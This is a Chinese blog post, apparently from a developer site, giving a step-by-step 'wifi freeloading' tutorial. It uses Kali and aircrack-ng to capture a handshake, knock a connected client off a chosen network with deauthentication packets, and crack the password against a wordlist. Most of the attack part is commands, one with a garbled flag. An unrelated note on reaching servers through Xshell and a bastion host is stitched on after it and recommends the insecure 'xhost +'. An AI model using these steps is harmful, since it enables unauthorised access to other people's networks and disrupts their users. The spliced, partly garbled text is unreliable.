wifi蹭网教程(图文教程超详细)

前期准备

  1. 支持监听的网卡一张
  2. 以及VMware

kali官网

https://www.kali.org/get-kali/#kali-virtual-machines

下载位置
在这里插入图片描述
下载了vm文件后可以直接用VMware打开,开机后
用户名:kali
密码:kali

正式开始

查看已安装网卡

以下的操作都需要提升权限,默认的root密码都是kali

#提升权限
sudo su
#查看网卡
airmon-ng

在这里插入图片描述
如果没有,请注意是否开启了网卡在虚拟机的连接,如下图
在这里插入图片描述

打开一个终端窗口

开启网卡监控

#开启监控
airmon-ng start wlan0

在这里插入图片描述
可以使用命令看看网卡的名字是否改变

ifconfig

在这里插入图片描述
可以看到最后的那个名字已经改变

扫描wifi

airodump-ng wlan0mon

我们选择这个名叫adcd的wifi进行操作
在这里插入图片描述

拿到握手包

上述方法后,按ctrl+c,退出扫描

输入命令

airodump-ng -w freedom -c 11 --bssid 9C:2E:A1:20:65:BC wlan0mon -ignore-nefative-oneaa

-c:指定信道
-w:指定握手包的存放位置或者名字,freedom是握手包的名字
–bssid:指定路由器的MAC

需要更改两个参数,信道和地址,这两个参数分别是扫描时确定要获取的无线参数

在这里插入图片描述

在这里插入图片描述
回车后,如下界面
在这里插入图片描述
从这个界面可以看出,选定的wifi一共有一个人连接,没有人连接的wifi是无法进行操作的

开始获取

这个步骤,说白了,就是将一个用户断开连接,让他重新连接无线,这样我们就能获取到握手包

重启一个终端窗口,一样的,先sudo一下,密码默认:kali

sudo su

执行如下命令,同样的,需要输入上一步的两个参数,一个客户机的MAC,和路由器的MAC

aireplay-ng -0 2 -a 9C:2E:A1:20:65:BC -c A4:50:46:D8:74:29 wlan0mon

-a:指定路由器的MAC
-c:指定客户机的MAC

在这里插入图片描述
执行成功后如上图,表明该客户机已经被成功的下线了,我们要做的就是等待客户机重新连接,他只要重新连接了,我们就能抓到握手包,进行跑字典。

抓取成功

当第四步的终端窗口出现如下
在这里插入图片描述
表明成功抓取到握手包,进行下一个步骤
注意!!这里抓到包一定要按ctrl+c退出抓包,不然抓到的握手包用不了哦

开始跑字典

包在**/home/kali/**文件夹下,找到名叫freedom-01.ivs文件,这个就是抓到的文件

在这里插入图片描述
然后就是字典,我个人建议将字典一同放在该目录下
在这里插入图片描述
然后再次重起一个终端窗口,输入如下命令

aircrack-ng -w pass.txt freedom-*.ivs

在这里插入图片描述
回车开始跑字典
请添加图片描述
能否成功看字典的是否强大,也看脸

成功界面
请添加图片描述
失败界面
在这里插入图片描述

温馨提示

本教程仅用于学习,请大家合理使用
未经本人允许,禁止转载,否则依法追究并要求索赔!

### 如何在 Dasusm 堡垒机中配置和使用 Xshell 进行安全连接 #### 配置环境变量 为了确保能够顺利通过Dasusm堡垒机进行Xshell的安全连接,需先确认本地计算机已正确设置环境变量。当遇到提示未安装客户端应用无法启动的情况时,这通常是因为缺少必要的环境变量配置[^3]。 对于Windows操作系统而言,在系统属性中的高级选项里找到环境变量设置窗口,新增三个必需的环境变量项来指定路径以及其它必要参数,从而使得相关组件能够在命令行环境下被识别并正常工作。 #### 使用Xshell连接Linux服务器并通过堡垒机跳转 完成上述准备工作之后,打开Xshell软件准备建立新的会话用于登录目标Linux主机: 1. 创建一个新的SSH会话,并输入要访问的目标机器地址作为Host。 2. 如果需要经过堡垒机转发,则可以在Tunneling标签页内定义隧道规则,即设定源端口与目的地址之间的映射关系;也可以采用代理方式,让所有的流量都经由特定的一台中间设备传递给最终的目的地。 3. 登录成功进入Linux终端后切换到所需的操作账户比如`oracle`用户:`su - oracle`[^2]。 #### 设置显示参数以便于图形界面操作 为了让某些依赖GUI的应用程序能在远端正确渲染图像数据流回本地面板展示出来,还需要特别注意调整DISPLAY环境变量指向正确的监听位置: 查看当前DISPLAY值可以用 `echo $DISPLAY` 来获取现有配置; 接着按照实际情况修改它为合适的格式如 `export DISPLAY=IP:1.0` ,这里的 IP 应该是指向运行着Xmanager Passive模式实例所在的位置; 最后允许来自任何地方对该显示服务发起请求:`xhost +` 并执行数据库创建助手(dbca)等带有图形界面的任务。 ```bash # 切换用户身份 su - oracle # 输出现有的DISPLAY变量值 echo $DISPLAY # 设定新的DISPLAY变量值 export DISPLAY=您的IP地址:1.0 # 授权显示权限 xhost + ```
评论 227
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值